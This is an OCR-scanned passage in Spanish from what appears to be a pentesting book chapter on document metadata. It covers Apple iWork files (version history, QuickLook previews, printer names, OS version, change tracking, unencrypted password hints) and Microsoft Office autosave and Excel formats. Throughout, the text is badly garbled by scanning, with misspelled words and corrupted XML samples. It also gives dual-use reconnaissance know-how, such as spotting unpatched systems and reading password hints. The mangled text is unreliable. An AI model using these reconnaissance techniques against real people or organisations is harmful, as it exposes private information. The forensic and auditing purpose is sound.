En  segundo  lugar,  todas  las  distintas  versiones  del  documento  se  almacenan  en  una  carpeta  llamada 
“Versions”.  Para  eada  una  de  ellas  tendremos  la  estructura  completa  de  un  documento  ODF  de 
OpenOffice,  es  deeir,  todo  lo  visto  hasta  el  momenta  se  volvera  a  aplicar  a  cada  una  de  las  versiones 
pues  contiene  I  os  archives  metaXML 3  settings  JX ML,  content  JCML,  etcetera. 


Imagen  01,37:  Carpeta  Versions  en  documento  ODT 


Metadatos  en  Apple  iWork 

El  paquete  Apple  iWork  esta  formado  por  Ires  aplicaciones  principales,  que  son  Pages ,  Numbers 
y  Keynote,  o  lo  que  es  lo  mis  mo,  un  procesador  de  textos,  una  hoja  de  calculo  y  un  editor  de 
presentac tones.  Sus  fonnatos  de  fichero  estan  basados  en  una  estructura  similar  a  ODF  y  OOXML , 
es  deem  una  estructura  de  carpetas  y  archives  comprimidos  en  un  unico  fichero  que  contiene  los 
siguientes  elementos  comunes: 

-  Fichero  Index:  Es  el  documento  maestro  del  archive.  Donde  esta  el  contenido,  Gambia  la 
extension  dependiendo  de  la  aplicacion. 

-  Fichero  B uildVersionHistory. plist:  Historial  de  versiones  del  documento. 

-  C  arp eta  Qu  ickL  ook :  C  on  li  ene  1  o  $  arc  hi  vos  de  pre  v  i  s  ua  1  i  z  ac  i  6  n , 

-  Carpeta  thumbs :  Miniaturas  creadas  per  la  aplicacion  de  imageries  incrustadas. 
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Archives  incrustados:  Archives  originates  incrustados  sin  modificar  en  el  documento. 


in  /Users/^.  ; 


pages 


,  L  !i  ^  ESI  "'i )  j  m  - 1  [  oj  -  q . 

l-C  :  -w  ,  /  •  •  .....  i&fr*  '■  L/ 


bu  i  fcf Ver  s  ion  H  i  sto  ry ,  p  \  i$t 


j  tndex,xml 

&  Quick  Look  ► 

Cj  thumbs  ► 


<?xnl  vers  1011="  1.0"  encading="UTF-B"?> 

<!DOCTYPE  pltst  PUBLIC  “-//App Le//DTE>  PLI5T  1.0//EN" 
"http : //www .app l e .com/DTDs/PropertyLi st-1 . 0 . dtd"> 

<£>  1 1st  version="  1 .0"> 

<a  1 r  a  1 . ■■■—--  — 

£^£trinq=-locaL  butld-JuL 
</arr a  1  . . .  j,u«hhh.ip 

</pltst> 


28  ZBlfl^trl 


Imagett  0138:  Visualization  interna  de  un  fichero  .Pages. 


Aunque  cada  tipo  de  archive  tiene  una  estructura  algo  diferentc  y  utilizan  esquemas  XML  distintos, 
la  visualizacion  de  la  Figura  01 38  de  un  documento  .Pages  es  similar  en  todos  los  archives  d £  Apple 
i  Work . 


El  fichero  Build Version History.plist 

Uno  de  los  licheros  que  se  encuentra  en  todos  los  documentos  de  Apple  iWork'QR  y  09  es 
BuildVersionHitory.plist.  Este  fichero  esta  eodificado  en  el  formato  Porperty  List  (.plist),  tan  comun 
en  los  entomos  Apple. 


En  sistemas  Mac  OSX \  puede  visual  izarse  su  conlenido  sin  nceesidad  de  uti  I  izar  ninguna  herramienta, 
ya  que  la  visualizacion  dc  ficheros  +plist  esta  integrada  en  Finder,  con  lo  que  basta  con  seleccionarlo 
y  ver  en  la  previsualizacidn  del  mismo  el  contenido. 


t  buHdVersionHistory.phst 


□  index.xml 
Q  QuickLook 


■  <?xm{  vers ton=" 1.0"  encoding="UTF-3"?> 

<! DOCTYPE  pList  PUBLIC  "-//App Le//DTD  PL I ST  1.0//EN" 
^  "  htt  p :  //www .  app  Le.aorrt/D  ID  s/Pr  oper  t  y  L  i  s  t- 1 . 9 .  dtef ,h  > 

<piist  verslont="l 
<array> 

<str  i  ng>p  ages -trunk- 2008 07 03 3Vstring> 

<str i ng>pgges-trunk-20080705jL</str i ng> 

<str  i  ng  >p  ag  es- trunk- 20 06 0829_1  Vstr  i  n  g> 

<str  i  ng>pages-trunk-20060904_l</s:trlng> 
<string> local  build-OuL  28  2010</string> 
-cstring>locat  build-3an  6  2011-^string> 

</array> 

</p List> 


Imagen  01 .39:  BuildVersionHis rory.pl is  1  visto  en  ia  pre  visualization  de  Finder  en  Mac  OS  X. 


Como  puede  verse  en  la  imagen,  el  contenido  de  este  fichero  es  una  lista  de  versiones  y  fechas  de 
edition  del  documento,  lo  que  pro  pore  iona  una  liiiea  temporal  para  ubicar  este  documento. 
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Vista  previa  en  ia  carpeta  QuickLook:  Preview.PDF  y  Thumbnail-jpg 

Con  el  objcto  de  obtener  un  vistazo  rapido  del  contenido  de  un  documento,  per  ejemplo  cuando  se 
visualiza  con  Finder  en  un  si  sterna  Mac  OS  X \  cada  archive  de  Apple  iWork  contiene  dentro  de  la 
carpeta  QuickLook  los  fieheros  de  previsualizacion  del  documento. 

Es  decir,  el  contenido  seria  equivalente  al  thumbnail  que  se  guarda  en  los  metadatas  EXIF  de  una 
fotografia.  Esa  pre  visual  izaeion  esta  almacenada  en  un  archive  llamado  Thumbnail. jpg  que  muestra 
la  primera  pagina  del  documento. 

Sin  embargo,  si  el  fichero  es  un  de  lipo  .Pages,  en  esta  carpeta,  por  defecto,  encontraremos  la  misma 
previsualizacion  del  documento  pero  en  fomiaio  PDF.  Esto  implica  situaciones  bastantes  curiosas, 
especial  men  te  en  el  fichero  PDF ,  ya  que  la  previsualizacion  se  real  iza  con  el  driver  de  creacion  de 
documentos  PDF  y  ia  configuracion  por  defecto  del  misma  que  tenga  la  maquina  en  la  que  se  esta 
trabajando.  Asi,  tal  y  como  se  puede  ver  en  la  figura  01  *40,  puede  aparecer  informacion  muy  jugosa 
como  el  usuario  del  sistema,  el  software  utilizado  para  crear  el  documento,  y,  en  este  caso,  la  version 
en  concreto  del  sistema  operative:  Mac  OS  X  1 0,6,4  Snow  Leopard. 


/Users 


q . . 

§  Preview.pdf 
Thumbnail. jpg 

S  O  O  { rifor m ac ion :  Fr evi ew .  pdf 


□  buitdVersionHistory,pHsi 
[j  Index.xmi 

[vv;  QuickLook  ► 

i  thumbs 


Preview.pdf 


96  KB 


Modiffcad6j>:  roartes  25  de  enero  de  ZOI1  10:10 


►  Comemarios  de  Spotliejftt: 


►  Ce neral :  . . . *n-mr  mim 

— — — — -  ,lllt'  i|— |  — - 

^  TTtiilo: ; 

Auto  res  Jim  Caskey 
Version:  1.3 
Paglnas:  2 

Resol uc J6n  :  309  x  400 
Seguridad:  None 
C  read  or  del  contenido:  Pages 

^Software  de  codification:  Mac  OS  X  10.6.4  Quartz  PDFContext 

_ _ _ _  ^ 

▼  ^  

!  Preview,  pdf 

G  Ooultar  extension 

►  Abrir  con 

►  Previsualtzact6n: 

►  Comparer  y  permisos: 


Tmagen  01,40:  Metadatas  eu  el  fichero  PreviewPDF  dentro  de  la  carpeia  QuickLook  tie  un  documento  Pages. 
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Como  se  puede  ver  en  la  irnagen  01 .40,  tenemos  en  este  case  un  documento  crcado  el  25  de  Enero 
de  20  3 1  actual izado  a  Mac  OS  XI  0.6.4  Snow  Leopard,  con  lo  que  sabemos  que  esa  maquina  no  tiene 
instalados  los  parches  de  seguridad  de  Mac  OS  X poster i ores,  que  solucionan  una  buena  can  lid  ad  de 
fat  I  os  de  seguridad, 

Carpeta  thumbs  y  archives  incrustados 

Dentro  de  un  fichero  de  Apple  iWork  es  posible  encontrar  dos  tipos  dc  archives  de  reeursos,  Estos 
hcheros  pueden  ser  videos,  imageries  u  otros  documentos  incrustados,  y  se  eneuentran  en  dos 
ubieaciones  distintas.  Unos  se  eneuentran  en  la  carpeta  raiz  del  documento  y  otros  dentro  de  la 
carpcta  thumbs,  y  iienen  caracteristicas  lotalmente  diferentes. 

Los  primeros  son  archivos  incrustados  que  permanccen  inalterados.  Estos  archives  no  han  side 
modi  head  os  por  3  a  aplicacion.  asi  que  man  iienen  los  metadatas  originates.  Pueden  ser  videos, 
imagenes,  o  archivos  de  audio,  y  cada  uno  de  el  los  merece  un  analisis  de  metadatas  distinto, 
Tambien  pueden  ofreeer  information  que  pertenezea  al  usuario  o  no,  Es  decir,  pueden  ser  fotos  o 
videos  dcscargados  de  Internet,  pero  tambien  fotografias  y  videos  tornados  por  el  telefono  movil  del 
creador  de  archivo,  por  ejemplo,  En  cualquier  caso  nierecen  un  analisis  de  metadatas  detallado  e 
independiente. 

Por  otro  lado,  sc  eneuentran  los  archivos  de  la  carpeta  Thumbs  y  que  son  ficheros  graficos  mod  if]  cad  os 
o  creados  por  la  propia  aplicacion,  lo  que  implica  que  cualquier  rastro  de  information  que  tengan 
depende  de  la  maquina  donde  se  creo  el  documento.  Asr,  si  se  copia  algo  en  el  portapapeles  y  se 
pega  al  documento,  al  carecer  de  un  fichero  de  soporte,  la  aplicacion  creara  un  fichero  en  la  carpeta 
Thumbs.  Esto  es  algo  que,  como  ya  mencionamos,  tambien  realiza  el  paquete  Microsoft  Office. 

El  perfil  de  color  y  los  documentos  graficos 

Los  perfiles  de  color  iCC  (International  Color  Consortium)  son  algo  muy  cunoso,  y  desde  hace 
mucho  tiempo  muy  cuidado  en  Apple.  Un  perfil  ICC  se  utiliza  para  configurar  la  forma  en  que  una 
paleta  de  colorcs  debe  ser  representada  en  un  determinado  dispositivo.  El  objetivo  es  aplicar  las 
correcciones  en  la  visualization  del  color  original  para  que  los  detalles  de  represen tac ion  del  color 
or i  gen  en  el  dispositivo  destino  sean  lo  mas  parecidos  posible. 

As i,  si  un  monitor  tiene  demasiada  luz  y  puede  hacer  que  un  morado  parezea  rosa,  se  aplica  un  perfil 
corrector  en  la  visualizacion  del  color  para  que  se  siga  viendo  morado  en  ese  monitor.  De  este  modo, 
en  los  equipos  de  Apple,  igual  que  en  maquinas  de  fotos,  labletas,  o  telefonos  moviles,  se  anade  la 
information  del  perfil  de  color  que  sc  utilizo  para  visualizar  o  tomar  la  foto,  para  ayudar  a  entender 
mejor  lo  que  se  queria  representar. 

En  los  documentos  graficos  que  aparecen  en  la  carpeta  thumbs ,  al  igual  que  el  archivo  thumbnail. }pg 
de  la  carpeta  QuickLook,  aparecen  los  perfiles  de  color,  tal  y  como  se  puede  ver  en  la  figura  01 .41 . 
Estos  debe  dan  ser  los  m  ism  os  si  el  documento  se  ha  creado  desde  una  misma  maquina  sin  que  el 
usuario  haya  tocado  la  configuration  del  perfil  de  la  misma.  Si  son  distintos,  es  que  el  documento  se 
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ha  niodificado  en  varias  maqumas  o  se  ha  cambiado  la  configuration  on  ol  periodo  de  creacidn  de 
documento,  algo  poco  probable. 

©  O  o  A  inform  acton ;  PageCapThumbV2“l,tiff 

1  — — — — — - —  w-«- T  ,,  ,  «■  ■  .  _ 

^  PageCapThumbV2-l.tiff  12  KB 

_ii«  J  Modification:  jueves  4  de  marzo  de  2010  06:2? 


►  Comen Earios  de  Spotlight: 


►  GeneraS: 

▼  Mas  inforaracion: 

Dimeosiones:  45  x  56 
Espacio  de  color:  RGft 
PerfU  de  color:  a  Mac 
Canal  al fa:  Si 

▼  Nombre  v  extension: 

FageCapThtimbV2-Ltiff 

Q  Qcultar  extension 

►  Abrir  con: 

►  Previsual  izaddn: 

►  Comparer  y  permisosi 

[mage ii  01.41:  Perfil  de  color  adaptado  para  ser  visualizado  en  un  iMac. 


Adem&s,  en  algunos  entornos,  como  se  puede  ver  en  la  figura  01.41,  el  nombre  del  perfil  puede 
ser  lo  suficientemente  claro  como  para  dar  information  detallada  de  donde  se  creo  un  detenninado 
documento,  en  este  caso  en  una  maquina  iMac, 

Archivos  con  extension  chrtshr 

Uno  de  los  tipos  de  archivos  incrustados  que  pueden  llamar  la  atencion  en  los  documentos  de  Apple 
son  los  ficheros  con  extension  .chrtshr,  pero  desde  el  panto  de  vista  de  metadatas  lienen  poco  que 
ofrecer  ya  que  son  solo  datos  para  la  generation  de  graficos,  por  lo  que  seran  muy  comuties  en 
fi chero  s  .  nu mb ers , 


Los  archivos  maestros:  Index.XML  e  Index.apxl 

En  los  documentos  Apple  W  ork,  el  ultimo,  pero  no  por  el  lo  menos  importante,  cs  el  archivo  maestro. 
Estc,  en  los  formatos  de  .Pages  y  .numbers  sc  llamara  index. XML.  mientras  que  en  Apple  Keynote,  es 
decir,  en  los  ficheros  .key  aparece  con  el  nombre  de  /rafex.apxl  (en  las  primeras  versiones  de  Apple 
Keynote  se  utiliza  presentation.apbc)  aun  que  real  men  te  es  tambien  un  fi  chero  en  formato  XML. 
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<?xml  version="lB0"?> 

<key :  presen tat  i  on  xm  l  ns :  sf  a= "  http :  //deve  L  oper .  app  L  e  .  com/namespaces/sf  a " 

xfn  Ins  :sf ="http  ://deve  Leper  .app  le  .com/namespaces/sf "  xm  l ns  :xsi=”http  ://ww ,w3  .org/ 

2001/XML5chema- instance"  xm Ins : key=" http  ://deve leper .appLe.com/namespaces/ 

key  note  2"  key: version^' 92008102400"  sfa:ID=“BGShow-0"  key  :pLoy-mode="  interactive" 

key :k i osk-s 1 i de-del ay =" 5"  key  :kiosk-bui  ld-deLay="2,i  key :mode=Hancen?«&ey : size 

sf  a  :w=,,1024"  sfa:h=,,?68Vxkey :  theme- 1  ist  sfa:ID=,,NSMutabLeArray-0,,xkey:  theme 

sf  a :  ID~"BGTheme-2"  key  :name="  Theme"  key:group- 

uu  i  d= " 72 AEC1 A1-7AF9-49CC-83D4-4147AB439EEET  key  :decima  L-tab=" .  "xkey  :size 
sf  a :  w= "  1024 "  sf  a :  h= 768  f7xkey :  sty  l  eshee  t 

sf  a :  I  D= "  SFSSty  L  esheet-27 "  xsf  :stylesxsf  :  vector-sty  Le  sfa;ID="SFTUectQrStyLe-234,, 
sf  :ident="tabu  Lar-def au  Lt-footer-bor der- vector-sty  Le- id" xsf :  property- 
mapxsf  :opacityxsf  :number  sfa : number- "1"  sfa:type="f  "/x/ 

Imagen  01.42:  Fichero  Index. apxl  dc  un  archive  .key. 


Dependiendo  del  tipo  de  documento,  estos  archives  maestros  tendran  una  espeeificacion  en  formato 
XML  diferente,  y  utilizaran  distintos  esquemas  de  nombres,  por  Lo  que  la  informacion  que  vamos  a 
encontrar  cn  cada  uno  de  el  los  sera  total  m  cute  distinla  entre  el  Los.  Ad  etnas  se  producira  el  mismo 
efecto  que  cn  otros  paquetes  ofimaticos,  en  I  os  que  unas  aplicaciones  dejan  m  as  informacion  oculta 
que  otras. 

Objeto  Medatada 

Dentro  de  estos  ficheros  maestros  hay  un  objeto  especihco  para  Los  metadatas;  es  deeir,  para  los 
dates  que  el  usuario  puede  manipular  directamentc  haciendo  uso  dc  la  aplicacion  de  Apple  iWork 
concreta. 


<sf  ;metadata> 

<sf  it  it  Le^<$f  string  sf  a:string="  7x/sf  :title> 

<sf :keywords> 

:  ar  r  ay  sf  a  r  I  D= "  NS  Array-  3E "  xsf :  str  i  n  g  sf  a :  st  r  i  r>g= M  V  x/sf :  ar  r  ay  > 

</sf :keywords> 

^F:Mbors>^  “  - ~ - —  ■  ■■ 1  '  1  — “| 

larray  sf  a :  ID=1,NSArray-361,xsf :  string  sf  a: string^”  Yx/sf  :array> 

</sf :authors> 

<sf':projects>  .  . . . .  . . "'J ■■  .  '  •• —  . 

<sf  :array  sf  a:  ID="  NS  Array-37 "xsf  :  string  sfa:strifig=H  '/x/sf  :array> 

</sf : project s> 

<sf :cororoent> 

<sf :  str  i  ng  sf  a :  str  i  ng= 11 "  /x/ sf :  comments 
<sf  icopyrightxsf  istring  sf  a:  string*  H(c)Vx/sf : copyrights- 
Vsf  :metadata> 

Imagen  01.43:  Objeto  Metadata. 

Como  se  puede  ver  en  la  Imagen  01.43,  en  el  caso  de  que  no  se  liaya  limpiado  la  mefa-informacidn 
del  documentor  es  posible  aceeder  a  la  informacion  habitual  en  metadatas,  entre  la  que  se  encuentran 
los  autores  del  documento,  No  existe  una  herramienta  especial  de  limpieza  de  metadatas,  solo  existe 
el  inspector  de  documentos,  donde  el  autor  decide  si  escribe  o  no  esos  dates. 
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Imogen  01.44:  Metadatas  en  Inspector  de  Documentor. 


Informacion  Oculta 

Respecto  a  ia  information  oeulia,  po demos  encontrar  una  gran  can ti dad  de  objetos  dentro  de  los 
archives  maestros  eon  informacion  jugosa,  como  rutas  locales,  versiones  de  sistema  operative, 
impresoras  configuradas  en  e!  equipo  o  fechas  de  versiones. 


Rutas  locales  en  atrihutos  path 

Dentro  de  muclios  de  los  atributos,  como  son  imageries  incrustadas,  plan  till  as,  graiicos,  etcetera,  es 
posible  encontrar  el  atributo  path,  con  informacion  relativa  a  rutas  locales  de  la  maquina  del  usuario 
que  creo  el  documento. 


<  l  s :  thumbna IT  sf  a :  I  D= "  SFR I  mageB  \  nary-7 11  > 
-csf  :stze  sfa:w*w32M  sfa:h="32V> 
<sf :data  sfa: ID="5FEDatq-7" 


sf  :  paths  "Temp  Lates/Shared/proto-thumbai  L  -Headers  .tiff 
sf  :displQvname="thumbs/prQtQ-thijrftbqi  1-Headers  .tiff 11 
sf : res ouru e-t ype=  '  i "  sf ishdraBTe^alse^  sf  :hf s-type=1f' 
</  i  $  t  thumbna i  L x/  i  s :  tabu  Lar-pr ototypo 


0"  sf  :stze="2260,V> 


lirtagen  01 .45:  Atributo  path  con  ruia  local  y  displayname  con  ml  a  interna  aJ  documento. 


Versiones  y  fechas  del  documento 

Para  gestionar  la  lista  de  versiones,  es  posible  encontrar  tin  objeto  llamado  version-history,  en  el  que 
se  identifiean  tod  as  las  versiones  que  se  ban  ereado  del  documento. 
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l :  vers  \  on~h  i  stor y> 

<s  l : number  sf  q : num  ber= " 200404220© "  sf  a : t  ype= " i " /^s  l : number  sf  a  r  number = " 2004  060800 "  sf a : ty pe= "i V> 

l :  number  sf  a :  number = "  2004961600 "  sfa:  ty  pe= "  i  "  /xs  l  :  number  sf  a :  number = "  2SO4062290  "  sf  a :  type= "  1 "  /> 

<s  L :  number  sf  a : number^ " 2904062900 "  sf  a  : type= " t " /xs  L : number  sf  a : number = " 2094072290 ”  sf  a : t  ype= " i " /> 

<5  L :  number  sf  a;  number^" 2004991600' M  sf  a :  type^1'  1 7>sS  L :  number  sf  a :  number^'  20940930001'  sfa  :type='i  Y> 

<s  I :  number  sfa  :niirfiber=" 2805091009 M  sfa :  type="  i "  /xs  L :  number  sfa  :number='' 208509120©“  sf  a  :type=“  i  "/> 
<sl  mumber  sfa: number ="20051 49609"  sfa : type=“ iVxs L : number  sfa: number^11 72006110200"  sfa:type="q"/> 
<s  l :  number  sfa:  number= "  7299611 9901 "  sfa:  type= "  q "  /xs  l :  number  sf  a :  number= IJ 7209611 1691 "  sf  a :  t  ype= 11  q "  /> 
l :  number  sfa  :number^  "72007010301 11  sf  a  :type="qVxsL  dumber  sfa; number ='72007012700"  sf  a:type="q'7> 
<s  l :  number  sf a : number ="7209706 140©“  sf  a  :type="q  Vi-^sL  :number  sf  a :  number  ="92098070300 11  sfa  :type="q"/> 
<s  1 :  number  sfa  :number=  " 92003082806 “  sf  a  :type=“ q  Vxs  L :  number  sf  a :  number  =  "92008090300 11  sfa  ;type=“  q  "/> 
<s  i ;  number  sf  a :  number  =  “  92008162400 11  sfa:  ty  pe= 11  q "  /> 

Vs  l  :verslon-history> 

Imogen  01.46:  Elemento  Version- history?. 


Ademas.  hay  dos  objetos  concretes  como  son  Last  Mo  difie  dDateProperty  y  CreationDate  Property, 
que  id  entitle  an  cuando  se  modified  por  ultima  vez  el  documento  y  cuando  fue  creado. 

Evidentemente,  cualquier  informacion  relaliva  a  fechas  en  un  documento  es  de  suma  importancia 
tanto  para  un  analisis  forense,  ya  que  permitiria  establecer  una  linea  temporal  de  los  hechos,  como 
para  un  pentester,  ya  que  le  permitiria  deseubrir  que  informacion  es  actual  y  cual  es  mas  antigua. 


Informacion  de  impresoras 

Dentro  de  los  documentos,  dependiendo  de  la  aplicacion  que  lo  cre6,  hay  un  objeto  llamado  doc- info 
o print-info,  que  guardan  el  nombre  de  la  impresora  que  el  usuario  tiene  conligurada. 

<Ls:LSFormattingPrinterIDProperty> 

<ls:strtng  sfa:string=‘,HP4730mfp_OA6_3rd_Floor_NorthjV> 

</  Ls  :L3ForraattingPr  inter  IDProperty> 


Fmagen  01,47:  Informacion  de  impresora  en  doc-info. 


<sl :NSPrinter> 

-csl  sprinter  sl:type="hp  psc  1200  series'7> 
</sL :NSPrinter> 

Imagen  01.48:  Informacion  de  impresora  on  print-info. 


Version  del  sistema  operativo 

Uno  de  los  objetos  que  contiene  informacion  mas  jugosa  sobre  la  maquina  del  usuario  es  OS  Vers  ion, 
que  contiene  la  version  concreta  del  sistema  operativo. 


Control  de  Cambios 

Y,  por  ultimo,  como  en  easi  todas  las  herramientas  de  edicion  de  documentos  actuates,  tambien  es 
posible  activar  el  control  de  cambios,  para  saber  que  usuarios  han  ido  modificando  el  documento  a 


Capitulo  l.  Los  Metadatas 


49 


lo  largo  de  su  vida,  Asf  si  esta  o  pc  ion  esta  activa,  sera  posible  acceder  a  esta  informacion  a  traves 
del  objeto:  change-tracking ; 

<sL  zchonge- tracking  si  :enato led="true"> 

:session-history> 

<sl : session  sf  : number ="0"  sf  :time-ref =" 342425012 .61529303" 
sf  rdate="201i-ll-88T07: 03: 32+0100"  sfa :ID="SFYSess ion-0" > 

<sf  : author  sf  :name="Cbema,l><sf  :colors  sf  :csid=“0Vx/sf  :author> 
</sl  :session> 

</sl :session-history> 

■Vsi  ichange-trackingxsl : section-prototypes:* _ 

Jmagen  01.49:  Control  de  cambios. 


Las  pistas  en  los  documcntos  Apple  iWork 

Los  documentos  que  se  crean  con  la  suite  de  Apple  iWork ,  ademas  de  todos  los  metadatas  que 
tieneri  conio  hemos  visto  hasta  el  momento,  euentan  con  la  posibilidad  de  proteger  un  determinado 
documento  con  una  contrasefta  que  tambien  puede  generar  una  pequerla  fuga  de  informacion.  Para 
que  el  usuario  pueda  recordar  que  contrasena  establecio  es  posible  anadir  una  pista,  que  le  haga 
recorder  cual  fue  la  clave  elegida  para  proteger  ese  documento  en  concreto. 


Set  a  password 

Password; 


Verify; 


Password  Hint: 
(Recommended) 


Cancel  |  Set  Password  J 


to  open  this  document: 


- - - - - — 

S3 

I 

Password  habitual| 

Imagen  01.50;  Password  hint  en  un  documento  de  Apple  iWork. 


Par  supuesto,  la  pista  recordatorio  no  se  cifra,  ya  que  de  otra  manera  seria  imposible  verla  sin  tener 
la  contrasena,  asi  que  basta  con  descomprimir  el  fichero  y  buscar  el  lugar  exacto  donde  se  almacena 
dentro  del  documento. 
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Imagen  01.51:  Password  hint  en  el  fichero. 
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Metadatos  en  otros  archivos  de  MS  Office 

Dentro  de  un  paquete  tan  complejo  como  Microsoft  Office  hay  irn  buen  conjunto  de  formatos 
de  archivos  distintos.  Muchos  de  ellos  no  son  demasiado  conocidos  pero  casi  todos  tienen  una 
caracteristica  comun:  Tienen  metadatos. 

Archives  de  autorecuperacion 

Las  aplicaciones  de  Microsoft  Office  tienen  una  ope  ion  may  util  de  generar  una  copia  autoguard  ad  a 
del  lichero  con  el  quo  se  estd  trabajando  per  si  acaso  se  produce  un  error  de  la  aplicacidn,  poder 
recuperarse.  Estos  ficheros  de  autoguardado  han  ido  cam  bi  an  do  con  el  tiempo,  pero  todos  tienen  dos 
caracteristicas  curiosas:  Son  en  formato  binario  y  conservan  todos  los  metadatos ♦ 

Los  ficheros  original es  que  se  utilizaban  para  el  autoguardado  temporal  emit  todos  con  extension 
TMP ,  asi  que  es  muy  habitual  encontrar  ficheros  con  extension  TMP  que  realmente  sean  reconocidos 
como  documentos  PPT,  XLS  o  DOC . 

Cuando  se  busca  este  tipo  de  archivos  en  Internet  con  Google ,  hay  que  tener  en  cuenta  que  con 
FILETYPEiPPT  no  van  a  aparecer,  asi  que  hay  que  busear  esos  documentos  con  extension  TMP. 

En  el  caso  de  Microsoft  Excel ,  ademas  de  los  archivos  .TMP  antiguos,  esta  tambien  el  formato  XAR . 
De  nuevo  se  trata  de  un  formato  binario,  y  tambien  conserve  todos  sus  metadatos,  informacion 
oculta  y  datos  perdidos. 

E*LS3  ar1QEB.xar-  University  of  Chicago 

ftp://deftadromeus.uchicago.edu/ar ray  1 /PE... /Excei/*ar10EB,xar  T 

A,  B,  Cf  D,  E,  F,  G,  H,  N,  Q,  R,  S,  T,  U,  V,  W,  X,  Y,  Z,  AA,  AB,  AC,  AD,  AE,  AF,  AG, 

AH,  Al.  AJ,  AK,  AL,  AM,  AN,  AO,  AP,  AQ,  AR,  AS,  AT,  All,  AV,  AW,  AX,  AY,  AZr  BA 


pcLS]ar3463.xar 

ftp :  //delta  d  ro  m  eu  s .  u  ch  icago .  ed  uL . .  /Excel/ -st  r34f>3 .  x. . .  t  T  rad  u  ci  r  esta  pag  i  na 
A,  B.  C.  D,  E,  F.  1,  2,  items.  Costs,  Notes,  3.  Flights  for  three  students,  $1,665.93, 
Frontier  Airlines.  4,  Hotel  Accomodations,  964.36,  One  room  added. 


Imagen  01 ,53:  Archives  Excel  autoguardados  en  formato  XAR, 

En  el  caso  de  Microsoft  Word ,  depend iendo  de  la  version  que  usernos  vamos  a  encontrar  ficheros  con 
extension  .ASD  o  J¥BK\  No  importa  si  estamos  trabajando  en  Microsoft  Office  2007  o  superior  con 
ficheros  OOXML,  en  este  caso  los  archivos  son  binaries  tambien. 

Per  supuesto,  si  bajamos  uno  de  esos  archivos  y  analizamos  los  metadatos  que  pueda  contener  uno 
de  esos  archi  vos  con  la  heuamienta  FOCA  Online*  podremos  ver  como  esta  lleno  de  sus  metadatos, 
por  lo  que  si  estuvieramos  hac iendo  una  auditor! a  podrfan  venir  de  maravilla. 

Si  queremos  ver  el  documento  de  forma  normal,  y  analizarlo,  le  cambiamos  la  extension  a  .DOC 
(formato  binario),  para  ver  que  metadatos  hay  en  el. 
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Generic  metadata  extracted 

&  Titte:  EXCEL  FOR  WINDOWS 
Application:  Microsoft  Office  97 
^  Encoding:  Latin  \ 

I  Statistics:  Pages:  1  Words:  1614  Characters:  9200  Bytes:  16896  Lines:  76  Paragraphs:  18 

£  User  defined  information:  _P!D_GUID:  {9BCFDBEO-5DO7-11D1-A399-QOCO4FB10 

E52} 

Times  edited:  2 
i  Template;  Excel f  outline. dot 
Operating  System:  Windows  NT  4,0 


Users  found 

^Preferred  Customer 
S  Authorized  Customer 
&CMSU 


Paths  found  on  the  file 

^A:\ 

-  \\CMSU2\PUBLiC\cJasses\Vates\ 

J  magen  01,53:  Analisis  con  FQCA  Online  de  los  metadatas  de  un  archive  autoguardado. 


Otros  formatos  de  doeumentos  en  Microsoft  Excel 

Una  aplicacion  como  Microsoft  Word \  Microsoft  Power  Forint  o  Microsoft  Excel  puede  gestionar 
decenas  de  formatos  de  fichero.  Machos  de  ellos  son  para  pequehas  utilidades  o  funciones  dentro  de 
la  hen-ami enta  o  simplemente  como  forma  de  intercam biar  datos  dc  forma  interoperable  con  otras 
suites.  Para  ejemplarizar  la  cantidad  de  ficheros  que  tienen  metadatas  en  un  paquete  ohmatico  y  de 
los  qne  liabna  que  preocuparse  en  todo  momento,  hem  os  elegido  Microsoft  Excels  que  cuenta  con  la 
siguiente  lista  de  formatos  natives: 

1.  .xU  Hoja  de  calculo  de  Excel 
%  .xla  -  Complement©  de  Excel 

3.  >xlb  -  Barra  de  herramientas  de  Excel 

4.  ,xle  -  Grafico  de  Excel 

5.  .xld  -  Base  de  datos  de  Excel 

6.  .xlk  -  Copia  de  seguridad  de  Excel 


52 


Pentesting  con  FOC/t 


7.  .XLL  -  Complemento  de  Excel 

8.  .xlm  -  Macro  de  Excel 

9.  .xls  -  Hoja  de  calculo  de  Excel 

10.  ,xlsb  —  Hoja  de  calculo  binario  de  Excel 

1 1 .  .xlsIITML  Hoja  de  calculo  de  Excel  para  internet  formato  HTML 

12.  .xlstn  -  Hoja  de  calculo  de  Excel  con  Macros  habilitadas 

13.  .xlt  -  Plantillas  de  Excel 

14.  .xlv  -  Modulo  de  Visual  Basic  de  Excel 

15.  .xlw  —  Espacio  de  trabajo  de  Excel 

16.  .xhv  -  Libro  de  Excel 

Cuando  se  hace  un  analisis  de  seguridad  se  deben  perseguir  todos  los  archives  ofimaticos  ya  que  si 
no  nos  quedariamos  sin  muchas  fugas  de  information  que  podrian  dar  information  jugosa.  De  igual 
forma,  cuando  de  proteger  las  fugas  de  informacion  de  una  empresa  se  trata,  hay  que  tener  cuidado 
con  todos. 

Si  nos  paramos  a  ver  como  son  todos  esos  ficheros  desde  el  punto  de  vista  de  estruetura  y  metadatas, 
salcn  algunas  cosas  curiosas  sobre  cada  uno  de  estos  tipos  que  os  resumimos  en  esta  lista,  de 
compatibilidad:-  X LA:  No  tiene  metadatas,  es  codigo  y  se  puede  ver  informacion  solo  en  los 
comentarios  de  los  programas  VBA  y  en  los  nombres  de  las  variables, 

1 .  -  XLB:  Sin  metadatas ,  es  un  archivo  de  codigo  binario, 

2.  -  XLC:  Codificacion  binaria.  Mismos  metadatas  que  un  XLS. 

3.  -  XLD;  Formato  XML  sin  metadatas. 

4.  -  XLK:  Formato  binario.  Mismos  metadatas  que  im  XLS. 

5.  -  XLL;  Formato  binario.  Mismos  metadatas  que  un  XLS. 

6.  -  XLM:  Codificacion  OOXML.  Mismos  metadatas  que  un  XLSX. 

7.  -  XLS:  El  formato  nativo. 

8 .  -  X  L  S  B :  F  ormato  binario,  Mismos  metadatas  que  XL  S. 

9.  -  XLS  HTML:  Codificacion  HTML 

10.  -  XLSM:  Codificacion  OOXML .  Mismos  metadatas  que  XMLX. 

11.  -  XLT:  Codificacion  binaria.  Mismos  metadatas  que  XLS. 

1 2.  -  XLV:  Codificacion  binaria.  Mismos  metadatas  que  XLS . 

13. -  XLW:  Codificacion  binario.  Mismos  metadatas 
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Como  se  puede  ver,  casi  todos  I  os  formates  ofrecen  metadatas  que  pueden  ser  extraidos  con  las 
herramientas  como  FOCA  Online  t  o  Me/aShield  Forensics,  solo  hay  que  bu  scar  I  os  cuando  se  este 
